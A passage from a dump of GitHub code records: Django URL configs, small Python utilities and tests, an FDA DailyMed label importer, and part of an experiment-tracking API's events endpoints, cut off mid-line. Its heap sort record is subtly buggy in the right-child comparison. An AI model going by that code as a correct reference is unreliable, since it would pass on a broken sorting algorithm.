_check_channel_names(evoked_ref, ['M1', 'M2'])\n ref_idx = evoked_ref.ch_names.index('M1')\n ref_idy = evoked_ref.ch_names.index('M2')\n ref_data = evoked_ref.data[[ref_idx, ref_idy], :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(evoked.info, meg=False, eeg=True)\n assert_array_equal(evoked.data[picks_eeg, :],\n evoked_ref.data[picks_eeg, :])\n\n # Test invalid inputs\n raw_np = read_raw_fif(fif_fname, preload=False)\n assert_raises(RuntimeError, add_reference_channels, raw_np, ['Ref'])\n assert_raises(ValueError, add_reference_channels, raw, 1)\n\nrun_tests_if_main()\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/mne-tools_mne-python/mne-python-master/mne/io/tests/test_reference.py","file_name":"test_reference.py","file_ext":"py","file_size_in_byte":18744,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"10219565949","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', include('base.urls')),\n path('auth/', include('users.urls')),\n path('meetings/', include('meetings.urls')),\n path('newsletters/', include('news.urls')),\n path('library/', include('library.urls')),\n path('admin/', admin.site.urls),\n path('summernote/', include('django_summernote.urls')),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)","repo_name":"sirthom9123/Church-Manager","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11272577200","text":"import numpy as np\n\ndef get_word_indices(word_list, index):\n common_indices = []\n new_word_list = []\n for word in word_list:\n try:\n common_indices.append(index[word])\n new_word_list.append(word)\n except KeyError:\n print(\"Unmapped word!\")\n return new_word_list, np.array(common_indices)","repo_name":"agonzalezreyes/coha-cooccur","sub_path":"src/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10072581574","text":"import tempfile\n\nfrom tinydb import Query\nfrom tinydb import TinyDB\n\nfrom flask_tinydb.storages import YAMLStorage\n\n\ndef test_yaml_storage():\n path = tempfile.mkstemp()[1]\n\n storage = YAMLStorage\n\n # Create a TinyDB instance\n db = TinyDB(path, storage=storage)\n\n name = Query()\n\n db.insert({\"name\": \"John Doe\"})\n assert db.all() == [{\"name\": \"John Doe\"}]\n\n db.insert({\"name\": \"Another John Doe\"})\n assert db.all() == [{\"name\": \"John Doe\"}, {\"name\": \"Another John Doe\"}]\n\n db.update({\"name\": \"John Doe II\"}, name.name == \"John Doe\")\n assert db.all() == [{\"name\": \"John Doe II\"}, {\"name\": \"Another John Doe\"}]\n\n db.remove(name.name == \"John Doe II\")\n assert db.all() == [{\"name\": \"Another John Doe\"}]\n","repo_name":"mmdbalkhi/Flask-tinydb","sub_path":"tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"4720622213","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n__author__ = 'zjbao123'\r\n\r\n\r\nclass heap_sort(object):\r\n def _max_heapify(self, alist, i, heap_size=None):\r\n length = len(alist)\r\n if heap_size is None:\r\n heap_size = length\r\n l = 2 * i + 1\r\n r = 2 * i + 2\r\n largest = i\r\n if l < heap_size and alist[l] > alist[i]:\r\n largest = l\r\n if l < heap_size and alist[r] > alist[i]:\r\n largest = r\r\n if largest != i:\r\n alist[i], alist[largest] = alist[largest], alist[i]\r\n self._max_heapify(alist, largest, heap_size)\r\n\r\n def _build_max_heap(self, alist):\r\n root_end = int(len(alist) / 2)\r\n for i in range(root_end-1,-1,-1):\r\n self._max_heapify(alist,i)\r\n\r\n def __call__(self, sort_list):\r\n self._build_max_heap(sort_list)\r\n heap_size = len(sort_list)\r\n for i in range(len(sort_list)-1,0,-1):\r\n sort_list[0],sort_list[i]=sort_list[i],sort_list[0]\r\n heap_size -=1\r\n self._max_heapify(sort_list, 0, heap_size)\r\n return sort_list\r\n","repo_name":"zjbao123/learn_python_demo","sub_path":"python27/algorithm/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33607227482","text":"import sqlite3\n\n\ndef get_cities():\n conn = sqlite3.connect('cities.db')\n c = conn.cursor()\n\n cities = []\n for row in c.execute(\"SELECT name, state FROM city ORDER BY state, name\"):\n cities.append({\n \"city\": row[0],\n \"state\": row[1]\n })\n\n return cities","repo_name":"alfredoheights/sunrisesunset","sub_path":"cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2059736083","text":"from bs4 import BeautifulSoup\nfrom contextlib import closing\nfrom datetime import datetime, timedelta\nimport logging\nimport re\nimport shutil\nimport urllib.request as request\nimport os\nfrom zipfile import ZipFile\nfrom distutils.util import strtobool\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom django.db.utils import IntegrityError, OperationalError\n\nfrom data.models import DrugLabel, LabelProduct, ProductSection\nfrom users.models import MyLabel\nfrom data.constants import FDA_SECTION_NAME_MAP\n\nlogger = logging.getLogger(__name__)\n\n# python manage.py load_fda_data --type test --cleanup False --insert False --count_titles True\n# python manage.py load_fda_data --type my_label --my_label_id 9 --cleanup False --insert False\n# runs with `python manage.py load_fda_data --type {type}`\nclass Command(BaseCommand):\n help = \"Loads data from FDA\"\n re_combine_whitespace = re.compile(r\"\\s+\")\n re_remove_nonalpha_characters = re.compile(\"[^a-zA-Z ]\")\n\n def __init__(self, stdout=None, stderr=None, no_color=False, force_color=False):\n root_logger = logging.getLogger(\"\")\n root_logger.setLevel(logging.INFO)\n\n self.root_dir = settings.MEDIA_ROOT / \"fda\"\n os.makedirs(self.root_dir, exist_ok=True)\n super().__init__(stdout, stderr, no_color, force_color)\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--type\", type=str, help=\"full, monthly, test or my_label\", default=\"monthly\"\n )\n parser.add_argument(\n \"--insert\", type=strtobool, help=\"Set to connect to DB\", default=True\n )\n parser.add_argument(\n \"--cleanup\", type=strtobool, help=\"Set to cleanup files\", default=False\n )\n parser.add_argument(\n \"--my_label_id\", type=int, help=\"set my_label_id for --type my_label\", default=None\n )\n parser.add_argument(\n \"--count_titles\", type=strtobool, help=\"output counts of the section_names\", default=False\n )\n\n \"\"\"\n Entry point into class from command line\n \"\"\"\n\n def handle(self, *args, **options):\n import_type = options[\"type\"]\n insert = options[\"insert\"]\n cleanup = options[\"cleanup\"]\n my_label_id = options[\"my_label_id\"]\n count_titles = options[\"count_titles\"]\n logger.debug(f\"options: {options}\")\n\n # my_label type already has the xml uploaded/downloaded\n if import_type == \"my_label\":\n record_zips = []\n xml_files = []\n else:\n root_zips = self.download_records(import_type)\n record_zips = self.extract_prescription_zips(root_zips)\n xml_files = self.extract_xmls(record_zips)\n\n if count_titles:\n self.count_titles(xml_files)\n\n self.import_records(xml_files, insert, my_label_id)\n\n if cleanup:\n self.cleanup(record_zips)\n self.cleanup(xml_files)\n\n logger.info(\"DONE\")\n\n # Test function for data exploration\n def get_names(self, xml_files):\n unapproved_count = 0\n exception_count = 0\n total_count = 0\n for xml_file in xml_files:\n total_count += 1\n with open(xml_file) as f:\n content = BeautifulSoup(f.read(), \"lxml\")\n product_name = \"\"\n generic_name = \"\"\n try:\n product_name = content.find(\"subject\").find(\"name\").text.upper()\n generic_name = content.find(\"genericmedicine\").find(\"name\").text\n unapproved_bool = False\n approval = content.find(\"approval\")\n if approval is not None:\n for code in approval.find_all(\"code\"):\n if \"unapproved\" in code.get(\"displayname\", \"\").lower():\n unapproved_bool = True\n except Exception as e:\n print(e)\n exception_count +=1\n if unapproved_bool:\n unapproved_count += 1\n print(f\"{product_name:50}\\t{generic_name:50}\\t{str(xml_file).split('/')[-1]}\")\n if total_count % 100 == 0:\n print(f\"{unapproved_count}:{len(xml_files)}\\t{exception_count}\")\n\n print(f\"{unapproved_count}:{len(xml_files)}\\t{exception_count}\")\n\n def download_records(self, import_type):\n logger.info(\"Downloading bulk archives.\")\n file_dir = self.root_dir / import_type\n os.makedirs(file_dir, exist_ok=True)\n records = []\n\n if import_type == \"full\":\n for i in range(1, 5):\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_release_human_rx_part{i}.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n elif import_type == \"monthly\":\n now = datetime.now()\n prev_month_lastday = now.replace(day=1) - timedelta(days=1)\n month, year = (\n prev_month_lastday.strftime(\"%b\").lower(),\n prev_month_lastday.year,\n )\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_monthly_update_{month}{year}.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n elif import_type == \"test\":\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_daily_update_10262021.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_daily_update_10182021.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n else:\n raise CommandError(\"Type must be one of 'full', 'monthly', or 'test'\")\n\n return records\n\n def download_single_zip(self, ftp, dest):\n url_filename = ftp.split(\"/\")[-1]\n file_path = dest / url_filename\n\n if os.path.exists(file_path):\n logger.info(f\"File already exists: {file_path}. Skipping.\")\n return file_path\n\n # Download the drug labels archive file\n with closing(request.urlopen(ftp)) as r:\n with open(file_path, \"wb\") as f:\n logger.info(f\"Downloading {ftp} to {file_path}\")\n shutil.copyfileobj(r, f)\n return file_path\n\n \"\"\"\n Daily Med will package it's bulk and monthly into groups of zips. This step is neccesary to\n extract individual drug label zips from the bulk archive.\n \"\"\"\n\n def extract_prescription_zips(self, zips):\n logger.info(\"Extracting prescription Archives\")\n file_dir = self.root_dir / \"record_zips\"\n os.makedirs(file_dir, exist_ok=True)\n record_zips = []\n\n for zip_file in zips:\n with ZipFile(zip_file, \"r\") as zip_file_object:\n for file_info in zip_file_object.infolist():\n if file_info.filename.startswith(\n \"prescription\"\n ) and file_info.filename.endswith(\".zip\"):\n outfile = file_dir / os.path.basename(file_info.filename)\n file_info.filename = os.path.basename(file_info.filename)\n if os.path.exists(outfile):\n logger.info(\n f\"Record Zip already exists: {outfile}. Skipping.\"\n )\n else:\n logger.info(f\"Creating Record Zip {outfile}\")\n zip_file_object.extract(file_info, file_dir)\n record_zips.append(outfile)\n return record_zips\n\n def extract_xmls(self, zips):\n logger.info(\"Extracting XMLs\")\n file_dir = self.root_dir / \"xmls\"\n os.makedirs(file_dir, exist_ok=True)\n xml_files = []\n\n for zip_file in zips:\n with ZipFile(zip_file, \"r\") as zip_file_object:\n for file in zip_file_object.namelist():\n if file.endswith(\".xml\"):\n outfile = file_dir / file\n if os.path.exists(outfile):\n logger.info(f\"XML already exists: {outfile}. Skipping.\")\n else:\n logger.info(f\"Creating XML {outfile}\")\n zip_file_object.extract(file, file_dir)\n xml_files.append(outfile)\n return xml_files\n\n def count_titles(self, xml_records):\n titles = []\n for xml_file in xml_records:\n try:\n with open(xml_file) as f:\n content = BeautifulSoup(f.read(), \"lxml\")\n\n for section in content.find_all(\"component\"):\n # the structuredbody component is the parent that contains everything, skip it\n structured_body = section.find_next(\"structuredbody\")\n if structured_body is not None:\n logger.debug(f\"SKIPPING: structuredbody\")\n continue\n\n code = section.find(\n \"code\", attrs={\"codesystem\": \"2.16.840.1.113883.6.1\"}\n )\n if code is None:\n continue\n title = str(code.get(\"displayname\")).upper()\n if title == \"SPL UNCLASSIFIED SECTION\":\n try:\n title = code.find_next_sibling().get_text(strip=True)\n logger.debug(f\"UNCLASSIFIED title: {title}\")\n except AttributeError:\n pass\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n title = self.re_remove_nonalpha_characters.sub(\"\", title)\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n\n titles.append(title)\n except Exception as e:\n logger.error(\"Error\")\n raise e\n\n import collections\n\n counter = collections.Counter(titles)\n logger.info(counter.most_common(10))\n import csv\n\n with open(\"top_displaynames.csv\", \"w\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow([\"displayname\", \"count\"])\n csvwriter.writerows(counter.most_common(3000))\n\n def import_records(self, xml_records, insert, my_label_id):\n logger.info(\"Building Drug Label DB records from XMLs\")\n\n if len(xml_records) == 0 and my_label_id is not None:\n logger.info(f\"processing my_label_id: {my_label_id}\")\n ml = MyLabel.objects.filter(pk=my_label_id).get()\n xml_file = ml.file.path\n dl = ml.drug_label\n self.process_xml_file(xml_file, insert, dl, my_label_id)\n # TODO better way to know if the process_xml_file was successful\n ml.is_successfully_parsed = True\n ml.save()\n else:\n for xml_file in xml_records:\n try:\n dl = DrugLabel()\n self.process_xml_file(xml_file, insert, dl, my_label_id)\n except Exception as e:\n logger.error(f\"Could not parse {xml_file}\")\n logger.error(str(e))\n continue\n\n\n def process_xml_file(self, xml_file, insert, dl, my_label_id=None):\n logger.debug(f\"insert: {insert}\")\n with open(xml_file) as f:\n content = BeautifulSoup(f.read(), \"lxml\")\n\n # Skip unapproved drug labels\n if self.check_if_unapproved(content):\n logger.info(f\"Skipping {xml_file} because it is not approved\")\n return\n\n dl.source = \"FDA\"\n dl.product_name = content.find(\"subject\").find(\"name\").text.title()\n try:\n generic_name = content.find(\"genericmedicine\").find(\"name\").text\n except AttributeError:\n # don't insert record if we cannot find this\n logger.error(\"unable to find generic_name\")\n return\n dl.generic_name = generic_name[:255].title()\n\n try:\n dl.version_date = datetime.strptime(\n content.find(\"effectivetime\").get(\"value\"), \"%Y%m%d\"\n )\n except ValueError:\n dl.version_date = datetime.now()\n\n try:\n dl.marketer = content.find(\"author\").find(\"name\").text.title()\n except AttributeError:\n dl.marketer = \"\"\n\n # Ensure always selecting the same ndc code if multiple\n ndc_codes = [ndc_code.get(\"code\") for ndc_code in content.find_all(\"code\", attrs={\"codesystem\": \"2.16.840.1.113883.6.69\"})]\n dl.source_product_number = sorted(ndc_codes)[0]\n \n \n if my_label_id is not None:\n dl.source_product_number = f\"my_label_{my_label_id}\" + dl.source_product_number\n\n # texts = [p.text for p in content.find_all(\"paragraph\")]\n # dl.raw_text = \"\\n\".join(texts)\n dl.raw_rext = \"\"\n\n lp = LabelProduct(drug_label=dl)\n\n root = content.find(\"setid\").get(\"root\")\n dl.link = f\"https://dailymed.nlm.nih.gov/dailymed/drugInfo.cfm?setid={root}\"\n\n try:\n if insert:\n dl.save()\n logger.info(f\"Saving new drug label: {dl}\")\n except IntegrityError as e:\n logger.error(str(e))\n return\n\n try:\n if insert:\n lp.save()\n logger.info(f\"Saving new label product\")\n except IntegrityError as e:\n logger.error(str(e))\n return\n\n # In the following section we will build the different sections. We do this by matching XML components\n # to predetermined FDA_SECTION_NAMES, and for components that do not match, we add them to an \"OTHER\"\n # category\n section_map = {}\n for section in content.find_all(\"component\"):\n # the structuredbody component is the parent that contains everything, skip it\n structured_body = section.find_next(\"structuredbody\")\n if structured_body is not None:\n logger.debug(f\"SKIPPING: structuredbody\")\n continue\n logger.debug(f\"section: {repr(section)}\")\n\n code = section.find(\n \"code\", attrs={\"codesystem\": \"2.16.840.1.113883.6.1\"}\n )\n if code is None:\n continue\n\n title = str(code.get(\"displayname\")).upper()\n logger.debug(f\"title: {title}\")\n\n if title == \"SPL UNCLASSIFIED SECTION\":\n try:\n title = code.find_next_sibling().get_text(strip=True)\n logger.debug(f\"UNCLASSIFIED title: {title}\")\n except AttributeError:\n pass\n\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n title = self.re_remove_nonalpha_characters.sub(\"\", title)\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n\n if title not in FDA_SECTION_NAME_MAP.keys():\n section_name = \"OTHER\"\n else:\n section_name = FDA_SECTION_NAME_MAP[title]\n\n # Now that we have determined what section, grab all the text in the component and add it as the\n # value to a corresponding hashmap. If a value already exists, add it to the end\n raw_section_texts = [str(p) for p in section.find_all(\"text\")]\n section_texts = \"
    \".join(raw_section_texts)\n logger.debug(f\"section_texts: {section_texts}\")\n\n # Save other titles in section text\n if section_name == \"OTHER\":\n section_texts = title + \"
    \" + section_texts\n\n # Save to keyed section of map, concatenating repeat sections\n if section_map.get(section_name) is None:\n section_map[section_name] = section_texts\n else:\n if section_name != \"OTHER\":\n logger.debug(\n f\"Found another section: {section_name}\\twith title\\t{title}\"\n )\n section_map[section_name] = (\n section_map[section_name]\n + f\"
    {title}
    \"\n + section_texts\n )\n\n # Now that the sections have been parsed, save them\n for section_name, section_text in section_map.items():\n ps = ProductSection(\n label_product=lp,\n section_name=section_name.title(),\n section_text=section_text,\n )\n try:\n if insert:\n ps.save()\n logger.debug(f\"Saving new product section {ps}\")\n except IntegrityError as e:\n logger.error(str(e))\n except OperationalError as e:\n logger.error(str(e))\n\n def check_if_unapproved(self, content):\n try:\n approval = content.find(\"approval\")\n if approval is not None:\n for code in approval.find_all(\"code\"):\n if \"unapproved\" in code.get(\"displayname\", \"\").lower():\n return True # It is unapproved\n except Exception as e:\n logger.warning(e)\n return False # Otherwise assume it is approved\n\n def cleanup(self, files):\n for file in files:\n logger.debug(f\"remove: {file}\")\n os.remove(file)\n","repo_name":"DrugLabelExplorer/dle","sub_path":"dle/data/management/commands/load_fda_data.py","file_name":"load_fda_data.py","file_ext":"py","file_size_in_byte":18203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30570101986","text":"import itertools\nimport math\nfrom collections import defaultdict\nfrom operator import itemgetter\nfrom typing import Sequence, Optional, Union, Tuple, Mapping\n\nimport attr\nimport jsonmodels.fields\nfrom boltons.iterutils import bucketize\n\nfrom apiserver.apierrors import errors\nfrom apiserver.apimodels.events import (\n MultiTaskScalarMetricsIterHistogramRequest,\n ScalarMetricsIterHistogramRequest,\n MetricEventsRequest,\n MetricEventsResponse,\n MetricEvents,\n IterationEvents,\n TaskMetricsRequest,\n LogEventsRequest,\n LogOrderEnum,\n NextHistorySampleRequest,\n MetricVariants as ApiMetrics,\n TaskPlotsRequest,\n TaskEventsRequest,\n ScalarMetricsIterRawRequest,\n ClearScrollRequest,\n ClearTaskLogRequest,\n SingleValueMetricsRequest,\n GetVariantSampleRequest,\n GetMetricSamplesRequest,\n TaskMetric,\n MultiTaskPlotsRequest,\n)\nfrom apiserver.bll.event import EventBLL\nfrom apiserver.bll.event.event_common import EventType, MetricVariants, TaskCompanies\nfrom apiserver.bll.event.events_iterator import Scroll\nfrom apiserver.bll.event.scalar_key import ScalarKeyEnum, ScalarKey\nfrom apiserver.bll.model import ModelBLL\nfrom apiserver.bll.task import TaskBLL\nfrom apiserver.config_repo import config\nfrom apiserver.database.model.model import Model\nfrom apiserver.database.model.task.task import Task\nfrom apiserver.service_repo import APICall, endpoint\nfrom apiserver.utilities import json, extract_properties_to_lists\n\ntask_bll = TaskBLL()\nevent_bll = EventBLL()\nmodel_bll = ModelBLL()\n\n\ndef _assert_task_or_model_exists(\n company_id: str, task_ids: Union[str, Sequence[str]], model_events: bool\n) -> Union[Sequence[Model], Sequence[Task]]:\n if model_events:\n return model_bll.assert_exists(\n company_id,\n task_ids,\n allow_public=True,\n only=(\"id\", \"name\", \"company\", \"company_origin\"),\n )\n\n return task_bll.assert_exists(\n company_id,\n task_ids,\n allow_public=True,\n only=(\"id\", \"name\", \"company\", \"company_origin\"),\n )\n\n\n@endpoint(\"events.add\")\ndef add(call: APICall, company_id, _):\n data = call.data.copy()\n added, err_count, err_info = event_bll.add_events(company_id, [data], call.worker)\n call.result.data = dict(added=added, errors=err_count, errors_info=err_info)\n\n\n@endpoint(\"events.add_batch\")\ndef add_batch(call: APICall, company_id, _):\n events = call.batched_data\n if events is None or len(events) == 0:\n raise errors.bad_request.BatchContainsNoItems()\n\n added, err_count, err_info = event_bll.add_events(\n company_id,\n events,\n call.worker,\n )\n call.result.data = dict(added=added, errors=err_count, errors_info=err_info)\n\n\n@endpoint(\"events.get_task_log\", required_fields=[\"task\"])\ndef get_task_log_v1_5(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n order = call.data.get(\"order\") or \"desc\"\n scroll_id = call.data.get(\"scroll_id\")\n batch_size = int(call.data.get(\"batch_size\") or 500)\n events, scroll_id, total_events = event_bll.scroll_task_events(\n task.get_index_company(),\n task_id,\n order,\n event_type=EventType.task_log,\n batch_size=batch_size,\n scroll_id=scroll_id,\n )\n call.result.data = dict(\n events=events, returned=len(events), total=total_events, scroll_id=scroll_id\n )\n\n\n@endpoint(\"events.get_task_log\", min_version=\"1.7\", required_fields=[\"task\"])\ndef get_task_log_v1_7(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n\n order = call.data.get(\"order\") or \"desc\"\n from_ = call.data.get(\"from\") or \"head\"\n scroll_id = call.data.get(\"scroll_id\")\n batch_size = int(call.data.get(\"batch_size\") or 500)\n\n scroll_order = \"asc\" if (from_ == \"head\") else \"desc\"\n\n events, scroll_id, total_events = event_bll.scroll_task_events(\n company_id=task.get_index_company(),\n task_id=task_id,\n order=scroll_order,\n event_type=EventType.task_log,\n batch_size=batch_size,\n scroll_id=scroll_id,\n )\n\n if scroll_order != order:\n events = events[::-1]\n\n call.result.data = dict(\n events=events, returned=len(events), total=total_events, scroll_id=scroll_id\n )\n\n\n@endpoint(\"events.get_task_log\", min_version=\"2.9\", request_data_model=LogEventsRequest)\ndef get_task_log(call, company_id, request: LogEventsRequest):\n task_id = request.task\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n\n res = event_bll.events_iterator.get_task_events(\n event_type=EventType.task_log,\n company_id=task.get_index_company(),\n task_id=task_id,\n batch_size=request.batch_size,\n navigate_earlier=request.navigate_earlier,\n from_timestamp=request.from_timestamp,\n )\n\n if request.order and (\n (request.navigate_earlier and request.order == LogOrderEnum.asc)\n or (not request.navigate_earlier and request.order == LogOrderEnum.desc)\n ):\n res.events.reverse()\n\n call.result.data = dict(\n events=res.events, returned=len(res.events), total=res.total_events\n )\n\n\n@endpoint(\"events.download_task_log\", required_fields=[\"task\"])\ndef download_task_log(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n\n line_type = call.data.get(\"line_type\", \"json\").lower()\n line_format = str(call.data.get(\"line_format\", \"{asctime} {worker} {level} {msg}\"))\n\n is_json = line_type == \"json\"\n if not is_json:\n if not line_format:\n raise errors.bad_request.MissingRequiredFields(\n \"line_format is required for plain text lines\"\n )\n\n # validate line format placeholders\n valid_task_log_fields = {\"asctime\", \"timestamp\", \"level\", \"worker\", \"msg\"}\n\n invalid_placeholders = set()\n while True:\n try:\n line_format.format(\n **dict.fromkeys(valid_task_log_fields | invalid_placeholders)\n )\n break\n except KeyError as e:\n invalid_placeholders.add(e.args[0])\n except Exception as e:\n raise errors.bad_request.FieldsValueError(\n \"invalid line format\", error=e.args[0]\n )\n\n if invalid_placeholders:\n raise errors.bad_request.FieldsValueError(\n \"undefined placeholders in line format\",\n placeholders=invalid_placeholders,\n )\n\n # make sure line_format has a trailing newline\n line_format = line_format.rstrip(\"\\n\") + \"\\n\"\n\n def generate():\n scroll_id = None\n batch_size = 1000\n while True:\n log_events, scroll_id, _ = event_bll.scroll_task_events(\n task.get_index_company(),\n task_id,\n order=\"asc\",\n event_type=EventType.task_log,\n batch_size=batch_size,\n scroll_id=scroll_id,\n )\n if not log_events:\n break\n for ev in log_events:\n ev[\"asctime\"] = ev.pop(\"timestamp\")\n if is_json:\n ev.pop(\"type\")\n ev.pop(\"task\")\n yield json.dumps(ev) + \"\\n\"\n else:\n try:\n yield line_format.format(**ev)\n except KeyError as ex:\n raise errors.bad_request.FieldsValueError(\n \"undefined placeholders in line format\",\n placeholders=[str(ex)],\n )\n\n if len(log_events) < batch_size:\n break\n\n call.result.filename = \"task_%s.log\" % task_id\n call.result.content_type = \"text/plain\"\n call.result.raw_data = generate()\n\n\n@endpoint(\"events.get_vector_metrics_and_variants\", required_fields=[\"task\"])\ndef get_vector_metrics_and_variants(call, company_id, _):\n task_id = call.data[\"task\"]\n model_events = call.data[\"model_events\"]\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n call.result.data = dict(\n metrics=event_bll.get_metrics_and_variants(\n task_or_model.get_index_company(), task_id, EventType.metrics_vector\n )\n )\n\n\n@endpoint(\"events.get_scalar_metrics_and_variants\", required_fields=[\"task\"])\ndef get_scalar_metrics_and_variants(call, company_id, _):\n task_id = call.data[\"task\"]\n model_events = call.data[\"model_events\"]\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n call.result.data = dict(\n metrics=event_bll.get_metrics_and_variants(\n task_or_model.get_index_company(), task_id, EventType.metrics_scalar\n )\n )\n\n\n# todo: !!! currently returning 10,000 records. should decide on a better way to control it\n@endpoint(\n \"events.vector_metrics_iter_histogram\",\n required_fields=[\"task\", \"metric\", \"variant\"],\n)\ndef vector_metrics_iter_histogram(call, company_id, _):\n task_id = call.data[\"task\"]\n model_events = call.data[\"model_events\"]\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n metric = call.data[\"metric\"]\n variant = call.data[\"variant\"]\n iterations, vectors = event_bll.get_vector_metrics_per_iter(\n task_or_model.get_index_company(), task_id, metric, variant\n )\n call.result.data = dict(\n metric=metric, variant=variant, vectors=vectors, iterations=iterations\n )\n\n\nclass GetTaskEventsScroll(Scroll):\n from_key_value = jsonmodels.fields.StringField()\n total = jsonmodels.fields.IntField()\n request: TaskEventsRequest = jsonmodels.fields.EmbeddedField(TaskEventsRequest)\n\n\ndef make_response(\n total: int, returned: int = 0, scroll_id: str = None, **kwargs\n) -> dict:\n return {\n \"returned\": returned,\n \"total\": total,\n \"scroll_id\": scroll_id,\n **kwargs,\n }\n\n\n@endpoint(\"events.get_task_events\", request_data_model=TaskEventsRequest)\ndef get_task_events(_, company_id, request: TaskEventsRequest):\n task_id = request.task\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=request.model_events,\n )[0]\n\n key = ScalarKeyEnum.iter\n scalar_key = ScalarKey.resolve(key)\n\n if not request.scroll_id:\n from_key_value = None if (request.order == LogOrderEnum.desc) else 0\n total = None\n else:\n try:\n scroll = GetTaskEventsScroll.from_scroll_id(request.scroll_id)\n except ValueError:\n raise errors.bad_request.InvalidScrollId(scroll_id=request.scroll_id)\n\n if scroll.from_key_value is None:\n return make_response(\n scroll_id=request.scroll_id, total=scroll.total, events=[]\n )\n\n from_key_value = scalar_key.cast_value(scroll.from_key_value)\n total = scroll.total\n\n scroll.request.batch_size = request.batch_size or scroll.request.batch_size\n request = scroll.request\n\n navigate_earlier = request.order == LogOrderEnum.desc\n metric_variants = _get_metric_variants_from_request(request.metrics)\n\n if request.count_total and total is None:\n total = event_bll.events_iterator.count_task_events(\n event_type=request.event_type,\n company_id=task_or_model.get_index_company(),\n task_id=task_id,\n metric_variants=metric_variants,\n )\n\n batch_size = min(\n request.batch_size,\n int(\n config.get(\"services.events.events_retrieval.max_raw_scalars_size\", 10_000)\n ),\n )\n\n res = event_bll.events_iterator.get_task_events(\n event_type=request.event_type,\n company_id=task_or_model.get_index_company(),\n task_id=task_id,\n batch_size=batch_size,\n key=ScalarKeyEnum.iter,\n navigate_earlier=navigate_earlier,\n from_key_value=from_key_value,\n metric_variants=metric_variants,\n )\n\n scroll = GetTaskEventsScroll(\n from_key_value=str(res.events[-1][scalar_key.field]) if res.events else None,\n total=total,\n request=request,\n )\n\n return make_response(\n returned=len(res.events),\n total=total,\n scroll_id=scroll.get_scroll_id(),\n events=res.events,\n )\n\n\n@endpoint(\"events.get_scalar_metric_data\", required_fields=[\"task\", \"metric\"])\ndef get_scalar_metric_data(call, company_id, _):\n task_id = call.data[\"task\"]\n metric = call.data[\"metric\"]\n scroll_id = call.data.get(\"scroll_id\")\n no_scroll = call.data.get(\"no_scroll\", False)\n model_events = call.data.get(\"model_events\", False)\n\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n result = event_bll.get_task_events(\n task_or_model.get_index_company(),\n task_id,\n event_type=EventType.metrics_scalar,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n metrics={metric: []},\n scroll_id=scroll_id,\n no_scroll=no_scroll,\n )\n\n call.result.data = dict(\n events=result.events,\n returned=len(result.events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\n@endpoint(\"events.get_task_latest_scalar_values\", required_fields=[\"task\"])\ndef get_task_latest_scalar_values(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n index_company = task.get_index_company()\n metrics, last_timestamp = event_bll.get_task_latest_scalar_values(\n index_company, task_id\n )\n last_iters = event_bll.get_last_iters(\n 